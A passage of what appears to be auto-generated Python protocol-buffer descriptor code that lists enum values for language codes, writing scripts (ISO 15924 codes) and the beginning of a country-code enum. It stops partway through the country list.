_descriptor.EnumValueDescriptor(
name='mk', index=104, number=104,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ml', index=105, number=105,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='mn', index=106, number=106,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='mr', index=107, number=107,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ms', index=108, number=108,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='mt', index=109, number=109,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='my', index=110, number=110,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='na', index=111, number=111,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='nb', index=112, number=112,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='nd', index=113, number=113,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ne', index=114, number=114,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ng', index=115, number=115,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='nl', index=116, number=116,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='nn', index=117, number=117,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='no', index=118, number=118,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='nr', index=119, number=119,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='nv', index=120, number=120,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ny', index=121, number=121,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='oc', index=122, number=122,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='oj', index=123, number=123,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='om', index=124, number=124,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='or', index=125, number=125,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='os', index=126, number=126,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='pa', index=127, number=127,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='pi', index=128, number=128,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='pl', index=129, number=129,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ps', index=130, number=130,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='pt', index=131, number=131,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='qu', index=132, number=132,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='rm', index=133, number=133,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='rn', index=134, number=134,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ro', index=135, number=135,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ru', index=136, number=136,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='rw', index=137, number=137,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sa', index=138, number=138,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sc', index=139, number=139,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sd', index=140, number=140,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='se', index=141, number=141,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sg', index=142, number=142,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='si', index=143, number=143,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sk', index=144, number=144,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sl', index=145, number=145,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sm', index=146, number=146,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sn', index=147, number=147,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='so', index=148, number=148,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sq', index=149, number=149,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sr', index=150, number=150,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ss', index=151, number=151,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='st', index=152, number=152,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='su', index=153, number=153,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sv', index=154, number=154,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='sw', index=155, number=155,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ta', index=156, number=156,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='te', index=157, number=157,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='tg', index=158, number=158,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='th', index=159, number=159,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ti', index=160, number=160,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='tk', index=161, number=161,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='tl', index=162, number=162,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='tn', index=163, number=163,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='to', index=164, number=164,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='tr', index=165, number=165,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ts', index=166, number=166,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='tt', index=167, number=167,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='tw', index=168, number=168,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ty', index=169, number=169,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ug', index=170, number=170,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='uk', index=171, number=171,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ur', index=172, number=172,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='uz', index=173, number=173,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ve', index=174, number=174,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='vi', index=175, number=175,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='vo', index=176, number=176,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='wa', index=177, number=177,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='wo', index=178, number=178,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='xh', index=179, number=179,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='yi', index=180, number=180,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='yo', index=181, number=181,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='za', index=182, number=182,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='zh', index=183, number=183,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='zu', index=184, number=184,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=1548,
serialized_end=3109,
)
_sym_db.RegisterEnumDescriptor(_LANGUAGE_LANGUAGE)
_LANGUAGE_SCRIPT = _descriptor.EnumDescriptor(
name='Script',
full_name='pb.Language.Script',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN_SCRIPT', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Adlm', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Afak', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Aghb', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Ahom', index=4, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Arab', index=5, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Aran', index=6, number=6,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Armi', index=7, number=7,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Armn', index=8, number=8,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Avst', index=9, number=9,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Bali', index=10, number=10,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Bamu', index=11, number=11,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Bass', index=12, number=12,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Batk', index=13, number=13,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Beng', index=14, number=14,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Bhks', index=15, number=15,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Blis', index=16, number=16,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Bopo', index=17, number=17,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Brah', index=18, number=18,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Brai', index=19, number=19,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Bugi', index=20, number=20,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Buhd', index=21, number=21,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Cakm', index=22, number=22,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Cans', index=23, number=23,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Cari', index=24, number=24,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Cham', index=25, number=25,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Cher', index=26, number=26,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Cirt', index=27, number=27,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Copt', index=28, number=28,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Cpmn', index=29, number=29,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Cprt', index=30, number=30,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Cyrl', index=31, number=31,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Cyrs', index=32, number=32,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Deva', index=33, number=33,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Dogr', index=34, number=34,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Dsrt', index=35, number=35,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Dupl', index=36, number=36,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Egyd', index=37, number=37,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Egyh', index=38, number=38,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Egyp', index=39, number=39,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Elba', index=40, number=40,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Elym', index=41, number=41,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Ethi', index=42, number=42,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Geok', index=43, number=43,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Geor', index=44, number=44,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Glag', index=45, number=45,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Gong', index=46, number=46,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Gonm', index=47, number=47,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Goth', index=48, number=48,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Gran', index=49, number=49,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Grek', index=50, number=50,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Gujr', index=51, number=51,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Guru', index=52, number=52,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hanb', index=53, number=53,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hang', index=54, number=54,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hani', index=55, number=55,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hano', index=56, number=56,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hans', index=57, number=57,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hant', index=58, number=58,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hatr', index=59, number=59,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hebr', index=60, number=60,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hira', index=61, number=61,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hluw', index=62, number=62,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hmng', index=63, number=63,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hmnp', index=64, number=64,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hrkt', index=65, number=65,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hung', index=66, number=66,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Inds', index=67, number=67,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Ital', index=68, number=68,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Jamo', index=69, number=69,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Java', index=70, number=70,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Jpan', index=71, number=71,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Jurc', index=72, number=72,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Kali', index=73, number=73,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Kana', index=74, number=74,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Khar', index=75, number=75,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Khmr', index=76, number=76,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Khoj', index=77, number=77,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Kitl', index=78, number=78,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Kits', index=79, number=79,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Knda', index=80, number=80,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Kore', index=81, number=81,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Kpel', index=82, number=82,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Kthi', index=83, number=83,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Lana', index=84, number=84,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Laoo', index=85, number=85,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Latf', index=86, number=86,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Latg', index=87, number=87,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Latn', index=88, number=88,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Leke', index=89, number=89,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Lepc', index=90, number=90,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Limb', index=91, number=91,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Lina', index=92, number=92,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Linb', index=93, number=93,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Lisu', index=94, number=94,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Loma', index=95, number=95,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Lyci', index=96, number=96,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Lydi', index=97, number=97,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mahj', index=98, number=98,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Maka', index=99, number=99,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mand', index=100, number=100,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mani', index=101, number=101,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Marc', index=102, number=102,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Maya', index=103, number=103,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Medf', index=104, number=104,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mend', index=105, number=105,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Merc', index=106, number=106,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mero', index=107, number=107,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mlym', index=108, number=108,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Modi', index=109, number=109,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mong', index=110, number=110,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Moon', index=111, number=111,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mroo', index=112, number=112,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mtei', index=113, number=113,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mult', index=114, number=114,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mymr', index=115, number=115,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Nand', index=116, number=116,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Narb', index=117, number=117,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Nbat', index=118, number=118,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Newa', index=119, number=119,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Nkdb', index=120, number=120,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Nkgb', index=121, number=121,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Nkoo', index=122, number=122,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Nshu', index=123, number=123,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Ogam', index=124, number=124,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Olck', index=125, number=125,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Orkh', index=126, number=126,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Orya', index=127, number=127,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Osge', index=128, number=128,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Osma', index=129, number=129,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Palm', index=130, number=130,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Pauc', index=131, number=131,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Perm', index=132, number=132,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Phag', index=133, number=133,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Phli', index=134, number=134,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Phlp', index=135, number=135,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Phlv', index=136, number=136,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Phnx', index=137, number=137,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Plrd', index=138, number=138,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Piqd', index=139, number=139,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Prti', index=140, number=140,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Qaaa', index=141, number=141,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Qabx', index=142, number=142,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Rjng', index=143, number=143,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Rohg', index=144, number=144,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Roro', index=145, number=145,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Runr', index=146, number=146,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Samr', index=147, number=147,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sara', index=148, number=148,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sarb', index=149, number=149,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Saur', index=150, number=150,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sgnw', index=151, number=151,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Shaw', index=152, number=152,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Shrd', index=153, number=153,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Shui', index=154, number=154,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sidd', index=155, number=155,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sind', index=156, number=156,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sinh', index=157, number=157,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sogd', index=158, number=158,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sogo', index=159, number=159,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sora', index=160, number=160,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Soyo', index=161, number=161,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sund', index=162, number=162,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sylo', index=163, number=163,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Syrc', index=164, number=164,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Syre', index=165, number=165,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Syrj', index=166, number=166,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Syrn', index=167, number=167,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Tagb', index=168, number=168,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Takr', index=169, number=169,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Tale', index=170, number=170,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Talu', index=171, number=171,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Taml', index=172, number=172,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Tang', index=173, number=173,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Tavt', index=174, number=174,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Telu', index=175, number=175,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Teng', index=176, number=176,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Tfng', index=177, number=177,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Tglg', index=178, number=178,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Thaa', index=179, number=179,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Thai', index=180, number=180,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Tibt', index=181, number=181,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Tirh', index=182, number=182,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Ugar', index=183, number=183,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Vaii', index=184, number=184,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Visp', index=185, number=185,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Wara', index=186, number=186,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Wcho', index=187, number=187,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Wole', index=188, number=188,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Xpeo', index=189, number=189,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Xsux', index=190, number=190,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Yiii', index=191, number=191,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Zanb', index=192, number=192,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Zinh', index=193, number=193,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Zmth', index=194, number=194,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Zsye', index=195, number=195,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Zsym', index=196, number=196,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Zxxx', index=197, number=197,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Zyyy', index=198, number=198,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Zzzz', index=199, number=199,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=3112,
serialized_end=5202,
)
_sym_db.RegisterEnumDescriptor(_LANGUAGE_SCRIPT)
_LOCATION_COUNTRY = _descriptor.EnumDescriptor(
name='Country',
full_name='pb.Location.Country',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN_COUNTRY', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AF', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AX', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AL', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DZ', index=4, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AS', index=5, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AD', index=6, number=6,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AO', index=7, number=7,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AI', index=8, number=8,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AQ', index=9, number=9,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AG', index=10, number=10,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AR', index=11, number=11,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AM', index=12, number=12,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AW', index=13, number=13,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AU', index=14, number=14,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AT', index=15, number=15,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AZ', index=16, number=16,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BS', index=17, number=17,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BH', index=18, number=18,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BD', index=19, number=19,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BB', index=20, number=20,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BY', index=21, number=21,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BE', index=22, number=22,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BZ', index=23, number=23,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BJ', index=24, number=24,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BM', index=25, number=25,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BT', index=26, number=26,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BO', index=27, number=27,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BQ', index=28, number=28,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BA', index=29, number=29,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BW', index=30, number=30,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BV', index=31, number=31,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BR', index=32, number=32,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IO', index=33, number=33,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BN', index=34, number=34,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BG', index=35, number=35,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BF', index=36, number=36,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BI', index=37, number=37,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KH', index=38, number=38,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CM', index=39, number=39,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CA', index=40, number=40,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CV', index=41, number=41,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KY', index=42, number=42,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CF', index=43, number=43,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TD', index=44, number=44,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CL', index=45, number=45,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CN', index=46, number=46,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CX', index=47, number=47,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CC', index=48, number=48,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CO', index=49, number=49,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KM', index=50, number=50,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CG', index=51, number=51,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CD', index=52, number=52,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CK', index=53, number=53,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CR', index=54, number=54,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CI', index=55, number=55,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='HR', index=56, number=56,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CU', index=57, number=57,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CW', index=58, number=58,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CY', index=59, number=59,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CZ', index=60, number=60,
options=None,
type=None),
